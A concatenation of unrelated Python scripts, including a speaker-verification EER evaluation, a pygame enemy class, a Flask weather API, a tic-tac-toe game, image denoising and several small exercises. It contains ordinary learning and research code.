apply_p_helper(test_spam,spam)
apply_p_helper(test_ham,ham)
total_docs = len(test_spam) + len(test_ham)
accuracy = float(count)/float(total_docs) * 100
print "Accuracy " ,accuracy
apply_p() |
# master branch modification test
import xml.etree.ElementTree as ET
import sqlite3
conn = sqlite3.connect('trackdb.sqlite')
cur = conn.cursor()
# make some fresh table using executescript()
cur.executescript('''
DROP TABLE IF EXISTS Artist;
DROP TABLE IF EXISTS Album;
DROP TABLE IF EXISTS Track;
CREATE TABLE Artist (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
name TEXT UNIQUE
);
CREATE TABLE Album (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
album_id INTEGER,
title TEXT UNIQUE
);
CREATE TABLE Track (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
title TEXT UNIQUE,
album_id INTEGER,
len INTEGER, rating INTEGER, count INTEGER
);
''')
#
|
import glob
import os
import numpy as np
import scipy
import torchaudio
from speechbrain.pretrained import EncoderClassifier
from tqdm import tqdm
from sklearn.metrics import roc_curve
from scipy.optimize import brentq
from scipy.interpolate import interp1d
from matplotlib import pyplot as plt
import argparse
SPEAKERS = ['S0767', 'S0901', 'S0903', 'S0905', 'S0916']
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--path_to_data',
type=str,
default='.\\TestTaskData\\data',
help='Path to data to perform evaluation on.'
)
parser.add_argument(
'--path_to_norm_set',
type=str,
default='.\\TestTaskData\\normalization_set.',
help='Path to normalization set')
parser.add_argument(
'--path_to_embeddings',
type=str,
default='.\\embeddings.npy',
help='Path to embeddings of the evaluation data set.')
parser.add_argument(
'--path_to_norm_set_embeddings',
type=str,
default='.\\norm_set_embeddings.npy',
help='Path to normalization set embeddings.')
parser.add_argument(
'--path_to_onehot_classes',
type=str,
default='.\\onehot_classes.npy',
help='Path to onehot classes of the evaluation set.')
args = parser.parse_args()
# initialize classifier
classifier = None
# get evaluation set embeddings
print("Extracting evaluation set embeddings...")
if os.path.exists(args.path_to_embeddings):
embeddings = np.load(args.path_to_embeddings, allow_pickle=True)
onehot_classes = np.load(args.path_to_onehot_classes, allow_pickle=True)
else:
# get evaluation set utterance paths
utterances = glob.glob(f'{args.path_to_data}\\*\\*')
# get Speechbrain classifier
classifier = EncoderClassifier.from_hparams(source="speechbrain/spkrec-ecapa-voxceleb")
# compute evaluation set embeddings with Speechbrain model and normalize them
onehot_classes = None
onehots = np.identity(len(SPEAKERS))
for utterance in tqdm(utterances):
signal, fs =torchaudio.load(utterance)
embedding = classifier.encode_batch(signal)
utterance_speaker = utterance.split('\\')[-2]
_class = SPEAKERS.index(utterance_speaker)
if onehot_classes is None:
onehot_classes = np.expand_dims(onehots[_class], 0)
embeddings = embedding[0]/np.linalg.norm(embedding[0])
else:
onehot_classes = np.concatenate([onehot_classes, np.expand_dims(onehots[_class], 0)], axis=0)
embeddings = np.concatenate([embeddings, embedding[0]/np.linalg.norm(embedding[0])], axis=0)
# save embeddings and one-hot classes as npy
np.save(args.path_to_embeddings, embeddings)
np.save(args.path_to_onehot_classes, onehot_classes)
# compute labels and scores between all pairs of evaluation set embeddings
label_matrix = onehot_classes@np.transpose(onehot_classes)
score_matrix = embeddings@np.transpose(embeddings)
indices = np.triu_indices(label_matrix.shape[0], 1)
labels = label_matrix[indices]
scores = score_matrix[indices]
# compute EER
fpr, tpr, thrs = roc_curve(labels, scores)
eer = brentq(lambda x : 1. - x - interp1d(fpr, tpr)(x), 0., 1.)
print(f'EER for evaluation set without normalization: {eer}')
# get normalization set embeddings
print("Extracting normalization set embeddings...")
if os.path.exists(args.path_to_norm_set_embeddings):
embeddings_norm_set = np.load(args.path_to_norm_set_embeddings, allow_pickle=True)
else:
# get normalization set utterance paths
utterances_norm_set = glob.glob(f'{args.path_to_norm_set}\\*')
# get Speechbrain classifier
if classifier is None:
classifier = EncoderClassifier.from_hparams(source="speechbrain/spkrec-ecapa-voxceleb")
# compute normalization set embeddings with Speechbrain model and normalize them
embeddings_norm_set = None
for utterance in tqdm(utterances_norm_set):
signal, fs = torchaudio.load(utterance)
embedding = classifier.encode_batch(signal)
utterance_speaker = utterance.split('\\')[-2]
if embeddings_norm_set is None:
embeddings_norm_set = embedding[0]/np.linalg.norm(embedding[0])
else:
embeddings_norm_set = np.concatenate([embeddings_norm_set, embedding[0]/np.linalg.norm(embedding[0])], axis=0)
# save normalization set embeddings as npy
np.save(args.path_to_norm_set_embeddings, embeddings_norm_set)
# compute EER with normalization for different normalization set sizes
eers_norm = []
lens_norm_set = []
len_norm_set = embeddings_norm_set.shape[0]
while len_norm_set != 1:
print(f'Doing normalization set size {len_norm_set}')
# compute cosine similarity between data set embeddings and normalization set embeddings
embeddings_norm_set = embeddings_norm_set[:len_norm_set]
score_matrix_for_norm = embeddings@np.transpose(embeddings_norm_set)
# compute average and std over the normalization set axis
means_for_norm = np.mean(score_matrix_for_norm, axis=1)
stds_for_norm = np.std(score_matrix_for_norm, axis=1)
# compute s-norm scores
means_x = means_for_norm[indices[0]]
means_y = means_for_norm[indices[1]]
stds_x = stds_for_norm[indices[0]]
stds_y = stds_for_norm[indices[1]]
scores_norm = 1/2*((scores - means_x)/stds_x + (scores - means_y)/stds_y)
# compute EER
fpr_norm, tpr_norm, thrs_norm = roc_curve(labels, scores_norm)
eer_norm = brentq(lambda x : 1. - x - interp1d(fpr_norm, tpr_norm)(x), 0., 1.)
eers_norm.append(eer_norm)
lens_norm_set.append(len_norm_set)
len_norm_set //= 2
print(f"EER's: {eers_norm}")
print(f"Norm set sizes: {lens_norm_set}")
plt.plot(lens_norm_set, eers_norm, marker='o', color='purple')
plt.plot([0, 160], [eer, eer], '--', color='red')
plt.xlabel('Length of norm set')
plt.ylabel('EER')
plt.legend(['with norm set', 'without norm set'])
plt.grid()
plt.savefig(f'eer_on_norm_set_length.png')
|
import tensorflow as tf
import pandas as pd
import numpy as np
from sample_generator import sampleGenerator
pse_data_loc = 'data/pse_data.csv'
wb_data_loc = 'data/wb_data.csv'
labels_loc = 'data/output_data.csv'
def calc_inference(pse_data, wb_data):
pse_data = tf.reshape(pse_data, [-1, 90, 412, 1])
wb_data = tf.reshape(wb_data, [-1, 5, 624, 1])
with tf.name_scope('pse_conv'):
W = tf.Variable(tf.truncated_normal([90, 1, 1, 5], stddev=0.05))
b = tf.Variable(tf.constant(0.05, shape=[5]))
pse_h = tf.nn.relu(tf.nn.conv2d(pse_data, filter=W, strides=[1, 1, 1, 1], padding='VALID') + b)
with tf.name_scope('wb_conv'):
W = tf.Variable(tf.truncated_normal([5, 1, 1, 3], stddev=0.05))
b = tf.Variable(tf.constant(0.05, shape=[3]))
wb_h = tf.nn.relu(tf.nn.conv2d(wb_data, filter=W, strides=[1, 1, 1, 1], padding='VALID') + b)
with tf.name_scope('fc1'):
num_pse = 412 * 5
num_wb = 624 * 3
W = tf.Variable(tf.truncated_normal([num_pse + num_wb, num_pse + num_wb], stddev=0.05))
b = tf.Variable(tf.constant(0.05, shape=[num_pse + num_wb]))
pse_flat = tf.reshape(pse_h, [-1, num_pse])
wb_flat = tf.reshape(wb_h, [-1, num_wb])
features = tf.concat([pse_flat, wb_flat], axis=1)
h1 = tf.nn.relu(tf.matmul(features, W) + b)
with tf.name_scope('fc2'):
W = tf.Variable(tf.truncated_normal([num_pse + num_wb, num_pse + num_wb], stddev=0.05))
b = tf.Variable(tf.constant(0.05, shape=[num_pse + num_wb]))
h2 = tf.nn.relu(tf.matmul(h1, W) + b)
with tf.name_scope('fc3'):
W = tf.Variable(tf.truncated_normal([num_pse + num_wb, 206], stddev=0.05))
b = tf.Variable(tf.constant(0.05, shape=[206]))
logits = tf.matmul(h2, W) + b
return logits
def calc_loss(logits, labels):
cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
return tf.reduce_mean(cross_entropy)
def calc_training(loss, learning_rate):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
train_op = optimizer.minimize(loss)
return train_op
def calc_accuracy(logits, labels):
y = tf.sigmoid(logits)
correct = tf.multiply(y, labels)
total = tf.reduce_sum(tf.round(y))
accuracy = tf.reduce_sum(tf.round(correct))
return accuracy / total
def calc_total(logits):
y = tf.sigmoid(logits)
total = tf.reduce_sum(tf.round(y))
return total
def main():
sample = sampleGenerator(pse_data_loc, wb_data_loc, labels_loc)
X_pse = tf.placeholder(tf.float32, [None, 90, 412])
X_wb = tf.placeholder(tf.float32, [None, 5, 624])
Y = tf.placeholder(tf.float32, [None, 206])
logits = calc_inference(X_pse, X_wb)
loss = calc_loss(logits, Y)
train_op = calc_training(loss, 0.05)
accuracy = calc_accuracy(logits, Y)
total = calc_total(logits)
init = tf.global_variables_initializer()
saver = tf.train.Saver()
with tf.Session() as sess:
summary_writer = tf.summary.FileWriter('log', sess.graph)
saver.restore(sess, tf.train.latest_checkpoint('save'))
#sess.run(init)
for i in range(10000):
pse_samples, wb_samples, labels_samples = sample.retrieve_sample(10)
_, curr_loss = sess.run([train_op, loss], feed_dict={X_pse: pse_samples, X_wb: wb_samples, Y: labels_samples})
if (i+1) % 100 == 0:
curr_accuracy = accuracy.eval(feed_dict={X_pse: pse_samples, X_wb: wb_samples, Y: labels_samples})
total_trade = total.eval(feed_dict={X_pse: pse_samples, X_wb: wb_samples, Y: labels_samples})
print("Step %d, training accuracy %g" % (i+1, curr_accuracy))
print("Step %d, training loss %g" % (i+1, curr_loss))
print("Step %d, total recommendations %g" % (i+1, total_trade))
saver.save(sess, 'save/model.ckpt')
if __name__ == '__main__':
main()
|
import math, random
import pygame as pg
from pygame.sprite import *
from player import Bullet
from utils import DamageBar, random_pos, media_path
TRANSPARENT = (0, 0, 0, 0)
class EnemySpawner:
""" Spawn new enemy objects every spawn interval"""
def __init__(self):
self.time = 0
self.spawn_interval = 250
self.enemies = Group()
self.enemies_killed = 0
self.spawn_sound = pg.mixer.Sound(media_path('spawn.wav'))
def spawn(self, player_pos):
self.spawn_sound.play()
# Calculate random position for spawning enemies
spawn_offset = 100
rand_pos = random_pos(player_pos, spawn_offset)
# Add Enemies to sprite group
e = Enemy(rand_pos, (50, 50))
self.enemies.add(e)
def update(self, dt, player_pos):
# Spawn when time is zero and after every 5 secs (roughy 5 seconds)
if self.time == 50 or (self.time > 100 and (self.time % self.spawn_interval) == 0):
self.spawn(player_pos)
self.time += 1
# Update sprites
self.enemies.update(dt, player_pos)
for enemy in self.enemies.sprites():
if enemy.killed:
self.enemies_killed += 1
enemy.kill()
class Enemy(Sprite):
""" Create enemy object and behaviour """
def __init__(self, pos, size):
Sprite.__init__(self)
self.size = size
self.original_img = self.make_image(self.size, pg.Color('green'))
self.image = self.original_img.copy()
self.rect = self.image.get_rect(center=pos)
self.true_pos = list(self.rect.center)
self.speed = 100
self.max_health = 100
self.health = 100
self.killed = False
self.damage_bar = DamageBar(self.rect.topleft, (50, 10), pg.Color('red'))
# Patrol Varialbles
self.patrol_radius = 200
self.patrol_points = []
self.current_patrol = 0
# Bullet Variables
self.bullets = Group()
self.bullet_interval = 50
self.bullet_time = 0
self.shoot = pg.mixer.Sound(media_path('enemy_gunshot.wav'))
def make_image(self, size, player_color):
img = pg.Surface(size).convert_alpha()
img.fill(TRANSPARENT)
rect = img.get_rect()
center = rect.center
pg.draw.rect(img, pg.Color('black'), [center[0] - 5, 40, 10, 40])
pg.draw.ellipse(img, pg.Color('black'), rect.inflate(-10, -10))
pg.draw.ellipse(img, player_color, rect.inflate(-20, -20))
return img
def update(self, dt, player_pos):
# Create enemy behaviour
# 1. Patrol - enemy moves through random points
# 2. Chase and attack - enemy follows player around and shoots at him/her
# If the enemy is more than patrol_radius units away from player
# do patrol
dist_vec = pg.math.Vector2(self.rect.center) - pg.math.Vector2(player_pos)
if dist_vec.length() >= self.patrol_radius:
# Change color of player image
self.original_img = self.make_image(self.size, pg.Color("green"))
self.image = self.original_img.copy()
self.patrol(dt)
else:
# Change color of player image
self.original_img = self.make_image(self.size, pg.Color("red"))
self.image = self.original_img.copy()
# Chase and shoot the player
self.chase(dt, player_pos)
# Clear the patrol points and reset current_patrol
self.patrol_points.clear()
self.current_patrol = 0
# Keep sprites within screen area
self.clamp()
# Update damage bar
pos = (self.rect.topleft[0] + 10, self.rect.topleft[1])
self.damage_bar.rect.center = pos
self.damage_bar.update(self)
# Update bullets
self.bullets.update(dt)
# Check if we have health
if self.health <= 0:
self.killed = True
def patrol(self, dt):
# Create patrol point if we ran out
if len(self.patrol_points) <= self.current_patrol:
range_ = 100
nxt_patrol = random_pos(self.rect.center, range_)
self.patrol_points.append(nxt_patrol)
# Move to the current patrol point
cpoint = self.patrol_points[self.current_patrol]
self.move_to(cpoint, dt)
# Update patrol point if we reached it
if pg.math.Vector2(cpoint[0] - self.rect.centerx, cpoint[1] - self.rect.centery).length() < 10:
self.current_patrol += 1
def chase(self, dt, player_pos):
# Chase the player
# 1. Look towards the player
self.rotate(player_pos)
# 2. Shoot the player
self.shoot_bullet()
# 3. Follow the player
self.move_to(player_pos, dt, isPlayer=True)
def move_to(self, pos, dt, isPlayer=False):
# Move towards vec pos
# Point towards target
self.rotate(pos)
# Calculate distance between current pos and target, and direction
vec = pg.math.Vector2(pos[0] - self.true_pos[0], pos[1] - self.true_pos[1])
direction = vec.normalize()
# Progress towards the target
if vec.length() > 10:
self.true_pos[0] += direction[0] * self.speed * dt
self.true_pos[1] += direction[1] * self.speed * dt
vec = pg.math.Vector2(pos[0] - self.true_pos[0], pos[1] - self.true_pos[1])
self.rect.center = self.true_pos
else:
# If the target is not a player, increment current_patrol if reached
if not isPlayer:
self.current_patrol += 1
def rotate(self, pos):
offset = (pos[1] - self.rect.centery, pos[0] - self.rect.centerx)
self.angle = 90 - math.degrees(math.atan2(*offset))
self.image = pg.transform.rotate(self.original_img, self.angle)
self.rect = self.image.get_rect(center=self.rect.center)
def shoot_bullet(self):
if self.bullet_time % self.bullet_interval == 0:
self.shoot.play()
pos = pg.mouse.get_pos()
vec = pg.math.Vector2(pos[0] - self.true_pos[0], pos[1] - self.true_pos[1]).normalize()
gun_pos = (self.rect.centerx + (vec.x * 25), self.rect.centery + (vec.y * 25))
b = Bullet(gun_pos, self.angle, color=pg.Color('red'))
self.bullets.add(b)
self.bullet_time += 1
def clamp(self):
screen_rect = pg.display.get_surface().get_rect()
if not screen_rect.contains(self.rect):
self.rect.clamp_ip(screen_rect)
self.true_pos = list(self.rect.center)
def check_collision(self, player):
# Check for collision with player
if self.rect.colliderect(player.rect):
# Resolve collision
self.speed = 0
else:
self.speed = 100
# Check for collicion with player bullets
if player.bullets:
for bullet in player.bullets:
if self.rect.colliderect(bullet.rect):
bullet.kill()
self.health -= 10
|
# Import dependencies
import numpy as np
import pandas as pd
import datetime as dt
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
#################################################
# Database Setup
#################################################
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# We can view all of the classes that automap found
Base.classes.keys()
# Save reference to the table
Measurement = Base.classes.measurement
Station = Base.classes.station
# Create our session (link) from Python to the DB
session = Session(engine)
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Flask Routes
#################################################
@app.route("/")
def welcome():
"""List all available api routes."""
return (
f"Hawaii Surfs Up Available API Routes:<br/>"
f"/api/v1.0/precipitation<br>"
f"/api/v1.0/stations<br>"
f"/api/v1.0/tobs<br>"
f"/api/v1.0/start_date<br>"
f"/api/v1.0/start_date/end_date<br>"
f"Note: start_date and end_date would be in 'YYYY-MM-DD' format.<br>"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
# Query results to a Dictionary using `date` as the key and `prcp` as the value.
prcp_results = session.query(Measurement.date,Measurement.prcp).filter(Measurement.date).all()
all_prcp = {}
for result in prcp_results:
date = result[0]
prcp = result[1]
all_prcp[date] = prcp
return jsonify(all_prcp)
@app.route("/api/v1.0/stations")
def stations():
# Return a json list of stations from the dataset.
station_results = session.query(Station.station).all()
all_stations = list(np.ravel(station_results))
return jsonify(all_stations)
@app.route("/api/v1.0/tobs")
def prev_temp():
# Return a json list of Temperature Observations (tobs) for the previous year -
# Using 2016-08-23 as previous year date start point since the last data point is 2017-08-23
prev_results = session.query(Measurement.tobs).filter(Measurement.date >= "2016-08-23").all()
prev_tobs = []
prev_tobs = list(np.ravel(prev_results))
return jsonify(prev_tobs)
@app.route("/api/v1.0/<start_date>")
def temp_start(start_date):
# Query using start date
start_results = session.query(func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)).filter(Measurement.date >= start_date).first()
# Create dictionary from results
temp_start_dict = {"TMIN": start_results[0], "TMAX": start_results[1], "TAVG": start_results[2]}
return jsonify(temp_start_dict)
@app.route("/api/v1.0/<start_date>/<end_date>")
def temp_start_end(start_date, end_date):
# Query using start date and end date
start_end_results = session.query(func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)).filter(Measurement.date >= start_date, Measurement.date <= end_date).first()
# Create dictionary from results
temp_end_dict = {"TMIN": start_end_results[0], "TMAX": start_end_results[1], "TAVG": start_end_results[2]}
return jsonify(temp_end_dict)
if __name__ == '__main__':
app.run(debug=True) |
# -*- python -*-
# Assignment: Making and Reading from Dictionaries
# Create a dictionary containing some information about yourself.
# The keys should include name, age, country of birth, favorite language.
my_info = {
'name': 'Firstname Lastname',
'age': 25,
'country of birth': 'USA',
'favorite language': 'Many'
}
# Write a function that can take in and print out any dictionary keys and values.
# The output will look something like the following:
#
# My name is Anna
# My age is 101
# My country of birth is The United States
# My favorite language is Python
# There are two steps to this process:
# - building a dictionary
# - gathering all the data from it
#
# Note: The majority of data we will manipulate as web developers will be hashed
# in a dictionary using key-value pairs. Repeat this assignment a few times to
# really get the hang of unpacking dictionaries, as it's a very common requirement
# of any web application.
def print_dict( d ):
for i in d:
print "My {} is {}".format( i, d[i] )
print "Testing print_dict ..."
print_dict( my_info )
print "End testing print_dict"
|
# Assignment "Tic-Tac-Toe" by Federico Pregnolato
# Create a Tic-Tac-Toe game to play in Python
import math
from typing import Counter
def main():
grid_squared = int(input('How many squares do you want on your grid? '))
max_val = grid_squared**2
n_digits = int(math.log10(max_val)) + 1
grid = create_grid(grid_squared)
draw_grid(grid, n_digits)
game_finished = False;
incorrect_number = True
player_x = 'X'
player_o = 'O'
is_finished = False
number_chosen = []
while game_finished != True:
x_selection = int(input(f"x's turn to choose a square (1-{max_val}): "))
while incorrect_number != False:
if x_selection < 1 or x_selection > max_val:
incorrect_number = True
x_selection = int(input(f"Incorrect value. Please choose a value between 1 and {max_val}: "))
elif x_selection in number_chosen:
incorrect_number = True
x_selection = int(input(f"Value already chosen. Please choose a value between 1 and {max_val} not already chosen: "))
else:
incorrect_number = False
number_chosen.append(x_selection)
updated_grid = change_element(x_selection, grid, player_x)
draw_grid(updated_grid, n_digits)
status = status_checker(updated_grid, player_x, player_o, max_val)
if status == 'player_x':
print(f"Congratulations player X! You won the game")
game_finished = True
break
elif status == 'player_o':
print(f"Congratulations player X! You won the game")
game_finished = True
break
elif status == 'draw':
print('Draw. Thanks for playing the game.')
game_finished = True
break
incorrect_number = True
o_selection = int(input(f"o's turn to choose a square (1-{max_val}): "))
while incorrect_number != False:
if o_selection < 1 or o_selection > max_val:
incorrect_number = True
o_selection = int(input(f"Incorrect value. Please choose a value between 1 and {max_val}: "))
elif o_selection in number_chosen:
incorrect_number = True
o_selection = int(input(f"Value already chosen. Please choose a value between 1 and {max_val} not already chosen: "))
else:
incorrect_number = False
number_chosen.append(o_selection)
updated_grid = change_element(o_selection, grid, player_o)
draw_grid(updated_grid, n_digits)
status = status_checker(updated_grid, player_x, player_o, max_val)
if status == 'player_x':
print(f"Congratulations player X! You won the game")
game_finished = True
elif status == 'player_o':
print(f"Congratulations player O! You won the game")
game_finished = True
elif status == 'draw':
print('Draw. Thanks for playing the game.')
game_finished = True
incorrect_number = True
def create_grid(n_rows_cols=3):
rows = []
k = 1
for _ in range(n_rows_cols):
new_row = []
for __ in range(n_rows_cols):
new_row.append(k)
k += 1
rows.append(new_row)
return rows
def draw_grid(grid_array, n_digits):
print()
for row in grid_array:
for element in row:
print(f"{element:{n_digits}}", end=' ')
print('|', end = ' ')
print()
if n_digits == 1:
print('--', end = '')
for _ in range(len(row)):
if _ == range(len(row))[-1]:
continue
print('+---', end = '')
print()
else:
print('---', end = '')
for _ in range(len(row)):
if _ == range(len(row))[-1] and n_digits >= 2:
continue
print('+----', end = '')
print()
print()
def change_element(number, grid_array, player):
for row in grid_array:
for element in row:
if number == element:
element_index = row.index(element)
row[element_index] = player
return grid_array
def status_checker(grid_array, player_x, player_o, max_val):
result1 = horizontal_checker(grid_array, player_x, player_o)
result2 = vertical_checker(grid_array, player_x, player_o)
result3 = lr_diagonal_checker(grid_array, player_x, player_o)
result4 = rl_diagonal_checker(grid_array, player_x, player_o)
result5 = draw_checker(grid_array, player_x, player_o, max_val)
if result1 != None:
return result1
elif result2 != None:
return result2
elif result3 != None:
return result3
elif result4 != None:
return result4
elif result5 != None:
return result4
else:
return None
def horizontal_checker(grid_array, player_x, player_o):
player_x_counter = 0
player_o_counter = 0
for row in grid_array:
for element in row:
if element == player_x:
player_x_counter += 1
elif element == player_o:
player_o_counter += 1
if player_x_counter == len(row):
return 'player_x'
elif player_o_counter == len(row):
return 'player_o'
else:
player_o_counter = 0
player_x_counter = 0
return None
def vertical_checker(grid_array, player_x, player_o):
i = 0
counter_x = 0
counter_o = 0
for i in range(len(grid_array)):
for j in range(len(grid_array)):
if grid_array[j][i] == player_x:
counter_x += 1
elif grid_array[j][i] == player_o:
counter_o += 1
if counter_x == len(grid_array):
return 'player_x'
elif counter_o == len(grid_array):
return 'player_o'
counter_x = 0
counter_o = 0
return None
def lr_diagonal_checker(grid_array, player_x, player_o):
i = 0
counter_x = 0
counter_o = 0
for i in range(len(grid_array)):
if grid_array[i][i] == player_x:
counter_x += 1
elif grid_array[i][i] == player_o:
counter_o += 1
if counter_x == len(grid_array):
return 'player_x'
elif counter_o == len(grid_array):
return 'player_o'
return None
def rl_diagonal_checker(grid_array, player_x, player_o):
i = 0
counter_x = 0
counter_o = 0
for i in range(len(grid_array)):
if grid_array[i][(len(grid_array)-1)-i] == player_x:
counter_x += 1
elif grid_array[i][i] == player_o:
counter_o += 1
if counter_x == len(grid_array):
return 'player_x'
elif counter_o == len(grid_array):
return 'player_o'
return None
def draw_checker(grid_array, player_x, player_o, max_val):
accumulator = 0
for row in grid_array:
for element in row:
if element == player_x or element == player_o:
accumulator += 1
if accumulator == max_val:
return 'draw'
else:
return None
if __name__ == '__main__':
main() |
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 12 15:56:48 2017
@author: modellav
"""
# Image Processing
# Import packages
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from skimage import img_as_float
from skimage.restoration import nl_means_denoising
from scipy import misc
from scipy.signal import convolve2d
import math
from heapq import *
######## IMAGE DENOISING ########
######## USE SK-IMAGE ########
#function to get standard dev of noise in a B&W image
def estimate_noise(I):
H, W = I.shape
M = [[1, -2, 1],
[-2, 4, -2],
[1, -2, 1]]
sigma = np.sum(np.sum(np.absolute(convolve2d(I, M))))
sigma = sigma * math.sqrt(0.5 * math.pi) / (6 * (W-2) * (H-2))
return sigma
############ DENOISE BLACK AND WHITE IMAGES ################
#read 2D image
image = misc.imread('lena_noisy.png')
shape = image.shape
image_matrix = img_as_float(image)
#estimate noise standard dev
sigma = estimate_noise(image_matrix)
#use package to denoise image
denoise_image = nl_means_denoising(image_matrix, 7, 9, sigma)
#plot noisy image and result, in black and white
fig, ax = plt.subplots(ncols=2, figsize=(8, 4), sharex=True, sharey=True,
subplot_kw={'adjustable': 'box-forced'})
ax[0].imshow(image_matrix, cmap = cm.Greys_r)
ax[0].axis('off')
ax[0].set_title('noisy')
ax[1].imshow(denoise_image, cmap = cm.Greys_r)
ax[1].axis('off')
ax[1].set_title('non-local means')
fig.tight_layout()
plt.show()
############ DENOISE COLOR IMAGES ################
#read 3D image
image = misc.imread('flower_0.10_noisy.jpg')
shape = image.shape
image_matrix = img_as_float(image)
#use package to denoise image
denoise_image = nl_means_denoising(image_matrix, 7, 9, 0.08)
#plot noisy image and result, in color
fig, ax = plt.subplots(ncols=2, figsize=(8, 4), sharex=True, sharey=True,
subplot_kw={'adjustable': 'box-forced'})
ax[0].imshow(image_matrix)
ax[0].axis('off')
ax[0].set_title('noisy')
ax[1].imshow(denoise_image)
ax[1].axis('off')
ax[1].set_title('non-local means')
fig.tight_layout()
plt.show() |
class Solution:
# @param A : list of list of integers
# @return an integer
def minPathSum(self, A):
for r in range(len(A) - 1, -1, -1):
for c in range(len(A[0]) - 1, -1, -1):
if r < len(A) - 1 and c < len(A[0]) - 1:
A[r][c] += min(A[r + 1][c], A[r][c + 1])
elif r < len(A) - 1:
A[r][c] += A[r + 1][c]
elif c < len(A[0]) - 1:
A[r][c] += A[r][c + 1]
return A[0][0]
|
def remove_url_anchor(url):
try:
return url[:url.index("#")]
except ValueError:
return url
'''
Complete the function/method so that it returns the url with
anything after the anchor (#) removed.
Examples:
# returns 'www.codewars.com'
remove_url_anchor('www.codewars.com#about')
# returns 'www.codewars.com?page=1'
remove_url_anchor('www.codewars.com?page=1')
'''
|
import os
import torch
import torch.nn as nn
import numpy as np
from easydict import EasyDict as edict
import logging
import cv2
import time
from network_factory import get_network
from datasets.loader_factory import get_loader
from utils import load_test_checkpoints, CalculateAcc, \
SelfData, load_cfg, print_to_screen
def test(test_loader, model, logger=None, Writer=None):
model.eval()
with torch.no_grad():
for its, (img_line, img_noise) in enumerate(test_loader):
img_line = img_line.cuda() if torch.cuda.is_available() else img_line
img_noise = img_noise.cuda() if torch.cuda.is_available() else img_noise
g_results = model(torch.cat((img_line, img_noise), 1))
for i in range(img_line.shape[0]):
img_line_test = img_line[i].cpu().numpy().transpose((1,2,0)) * 255
img_line_test = img_line_test.squeeze()
cv2.imwrite((cfg.PATH.RES_TEST+"line_{}.jpg".format(i+its)), img_line_test)
img_res_test = g_results[i].cpu().numpy().transpose((1,2,0)) * 255
cv2.imwrite((cfg.PATH.RES_TEST+"res_{}.jpg".format(i+its)), img_res_test)
print("{}/{}".format(i+its,its_num))
def embedding(val_loader,val_loader_1, model_0, model_1, model_2, logger, print_fre=50):
model_0.eval()
model_1.eval()
model_2.eval()
its_num = len(val_loader)
acc_single_val = CalculateAcc()
data_begin = time.time()
with torch.no_grad():
for its, (load_0, load_1) in enumerate(zip(val_loader,val_loader_1)):
data_time = time.time()-data_begin
imgs, targets, imgs_1 = load_0[0], load_0[1], load_1[0]
imgs = imgs.cuda() if torch.cuda.is_available() else imgs
targets = targets.cuda() if torch.cuda.is_available() else targets
outputs_0 = model_0(imgs)
outputs_1 = model_1(imgs_1)
outputs_2 = model_2(imgs)
outputs = (outputs_0 + outputs_1 + outputs_2)/3
loss = 0
train_time = time.time()-(data_time+data_begin)
data_begin = time.time()
acc_single_val.add_value(outputs.cpu(),targets.cpu())
mem = torch.cuda.memory_cached() / 1E9 if torch.cuda.is_available() else 0
if its % print_fre == 0:
print_to_screen(loss, 0, its, 0, its_num,
logger, data_time, train_time, mem, acc=acc_single_val.print_())
return acc_single_val.print_()
def val(val_loader, model, logger=None, loss_function=None, epoch=0, print_fre=50):
model.eval()
its_num = len(val_loader)
acc_single_val = CalculateAcc()
loss_val = SelfData()
data_begin = time.time()
with torch.no_grad():
for its, (imgs, targets) in enumerate(val_loader):
data_time = time.time()-data_begin
imgs = imgs.cuda() if torch.cuda.is_available() else imgs
targets = targets.cuda() if torch.cuda.is_available() else targets
outputs = model(imgs)
loss = loss_function(outputs,targets) if loss_function is not None else torch.tensor(0)
train_time = time.time()-(data_time+data_begin)
data_begin = time.time()
loss_val.add_value(loss.cpu())
acc_single_val.add_value(outputs.cpu(),targets.cpu())
mem = torch.cuda.memory_cached() / 1E9 if torch.cuda.is_available() else 0
if its % print_fre == 0:
print_to_screen(loss, 0, its, epoch, its_num,
logger, data_time, train_time, mem, acc=acc_single_val.print_())
return acc_single_val.print_(), loss_val.avg()
if __name__ == "__main__":
import sys
if len(sys.argv) < 2:
print ("Usage: python test.py [eval, test, embedding]")
else:
cmd = sys.argv[1]
from config_cub import cfg
logger = load_cfg(cfg)
model = get_network(cfg.MODEL.NAME, cfg=cfg.MODEL, logger=logger)
model = torch.nn.DataParallel(model, cfg.GPUS).cuda() if torch.cuda.is_available() else model
load_test_checkpoints(model, cfg.PATH, logger, use_best=True)
if cmd == 'eval':
test_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.EVAL, 'eval',label_path=cfg.PATH.LABEL, cfg=cfg.TRAIN, logger=logger)
acc_val, _ = val(test_loader, model, logger, print_fre=cfg.PRINT_FRE,)
logger.info("Prec@1:%.4f"%(acc_val))
elif cmd =='test':
test_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.TEST, 'test', cfg.TRAIN, logger)
test(test_loader, model, logger)
elif cmd =='embedding':
test_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.EVAL, 'eval',label_path=cfg.PATH.LABEL, cfg=cfg.TRAIN, logger=logger)
from config_cub_1 import cfg1
logger = load_cfg(cfg1)
model_1 = get_network(cfg1.MODEL.NAME, cfg=cfg1.MODEL, logger=logger)
model_1 = torch.nn.DataParallel(model_1, cfg1.GPUS).cuda() if torch.cuda.is_available() else model_1
load_test_checkpoints(model_1, cfg1.PATH, logger, use_best=True)
